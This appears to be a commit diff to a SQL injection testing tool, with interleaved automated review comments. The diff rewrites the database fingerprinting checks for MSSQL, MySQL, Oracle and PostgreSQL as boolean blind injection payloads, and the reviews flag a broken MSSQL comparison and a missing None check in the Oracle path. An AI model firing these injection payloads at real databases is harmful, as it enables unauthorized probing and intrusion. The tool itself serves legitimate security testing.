Commit 79c8d63

Major speed increase in DBMS basic fingerprint
1 parent 64bb57d commit 79c8d63

4 files changed

Lines changed: 45 additions & 26 deletions


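--- a/plugins/dbms/mssqlserver.py
+++ b/plugins/dbms/mssqlserver.py
@@ -177,18 +177,24 @@ def checkDbms(self):
         logger.info(logMsg)
 
         randInt = str(randomInt(1))
-        query = "LTRIM(STR(LEN(%s)))" % randInt
-
-        if inject.getValue(query) == "1":
-            query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
-            version = inject.getValue(query)
-
-            if version == "8":
-                kb.dbmsVersion = ["2008"]
-            elif version == "5":
-                kb.dbmsVersion = ["2005"]
-            elif version == "0":
-                kb.dbmsVersion = ["2000"]
+
+        payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='%s'" % (randInt, randInt))
+        result = Request.queryPage(payload)
+
+        if result == True:
+            for version in ( 0, 5, 8 ):
+                payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 25, 1)='%d'" % version)
+                result = Request.queryPage(payload)
+
+                if result == True:
+                    if version == 8:
+                        kb.dbmsVersion = ["2008"]
+                    elif version == 5:
+                        kb.dbmsVersion = ["2005"]
+                    elif version == 0:
+                        kb.dbmsVersion = ["2000"]
+
+                    break
 
         if kb.dbmsVersion:
             setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])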
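Review bot: The new probe on line 181 compares `LTRIM(STR(LEN(randInt)))` against the random digit itself, but LEN() of a single-digit value is 1, so — assuming `randomInt(1)` yields one digit, as the removed `== "1"` comparison implies — the check only passes when randInt happens to be '1' and the MSSQL fingerprint will usually fail. The line should read `payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='1'" % randInt)`, which restores the removed comparison. Separately, `if result == True:` on lines 184 and 189 (and the matching `== True` / `!= True` comparisons in mysql.py, oracle.py and postgresql.py) tests a boolean with `==`; `if result:` / `if not result:` is the idiomatic form and also behaves sensibly if queryPage ever returns something other than a bool. checkDbms starts before this hunk and continues after it.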

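--- a/plugins/dbms/mysql.py
+++ b/plugins/dbms/mysql.py
@@ -249,15 +249,18 @@ def checkDbms(self):
         logger.info(logMsg)
 
         randInt = str(randomInt(1))
-        query = "CONCAT('%s', '%s')" % (randInt, randInt)
 
-        if inject.getValue(query) == (randInt * 2):
+        payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()")
+        result = Request.queryPage(payload)
+
+        if result == True:
             logMsg = "confirming MySQL"
             logger.info(logMsg)
 
-            query = "LENGTH('%s')" % randInt
+            payload = agent.fullPayload(" AND CONCAT('%s', '%s')='%s%s'" % (randInt, randInt, randInt, randInt))
+            result = Request.queryPage(payload)
 
-            if not inject.getValue(query) == "1":
+            if result != True:
                 warnMsg = "the back-end DMBS is not MySQL"
                 logger.warn(warnMsg)
 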

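--- a/plugins/dbms/oracle.py
+++ b/plugins/dbms/oracle.py
@@ -26,6 +26,7 @@
 
 import re
 
+from lib.core.agent import agent
 from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
@@ -38,6 +39,7 @@
 from lib.core.settings import ORACLE_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.request import inject
+from lib.request.connect import Connect as Request
 
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@@ -163,17 +165,17 @@ def checkDbms(self):
         logMsg = "testing Oracle"
         logger.info(logMsg)
 
-        query = "LENGTH(SYSDATE)"
-        sysdate = inject.getValue(query)
+        payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
+        result = Request.queryPage(payload)
 
-        if sysdate and int(sysdate) > 0:
+        if result == True:
             logMsg = "confirming Oracle"
             logger.info(logMsg)
 
-            query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
-            version = inject.getValue(query)
+            payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
+            result = Request.queryPage(payload)
 
-            if not version:
+            if result != True:
                 warnMsg = "the back-end DMBS is not Oracle"
                 logger.warn(warnMsg)
 
@@ -186,6 +188,9 @@ def checkDbms(self):
             if not conf.extensiveFp:
                 return True
 
+            query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
+            version = inject.getValue(query)
+
             if re.search("^11", version):
                 kb.dbmsVersion = ["11i"]
             elif re.search("^10", version):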
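Review bot: Moving the SYS.PRODUCT_COMPONENT_VERSION lookup below the `extensiveFp` early return (new lines 191-192) drops the `if not version:` guard the old code applied before using the result, so an empty or None return from `inject.getValue` now reaches `re.search("^11", version)` on line 194, which raises TypeError for None. Add a guard between the lookup and the regex chain, e.g. `if not version:` / `return True`, so an unresolved version degrades to the same outcome as the non-extensive path. The version-branch chain and the rest of checkDbms continue past the end of this hunk.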

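--- a/plugins/dbms/postgresql.py
+++ b/plugins/dbms/postgresql.py
@@ -26,6 +26,7 @@
 
 import re
 
+from lib.core.agent import agent
 from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
@@ -39,6 +40,7 @@
 from lib.core.settings import PGSQL_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.request import inject
+from lib.request.connect import Connect as Request
 
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@@ -168,15 +170,18 @@ def checkDbms(self):
         logger.info(logMsg)
 
         randInt = str(randomInt(1))
-        query = "COALESCE(%s, NULL)" % randInt
 
-        if inject.getValue(query) == randInt:
+        payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
+        result = Request.queryPage(payload)
+
+        if result == True:
             logMsg = "confirming PostgreSQL"
             logger.info(logMsg)
 
-            query = "LENGTH('%s')" % randInt
+            payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
+            result = Request.queryPage(payload)
 
-            if not inject.getValue(query) == "1":
+            if result != True:
                 warnMsg = "the back-end DMBS is not PostgreSQL"
                 logger.warn(warnMsg)
 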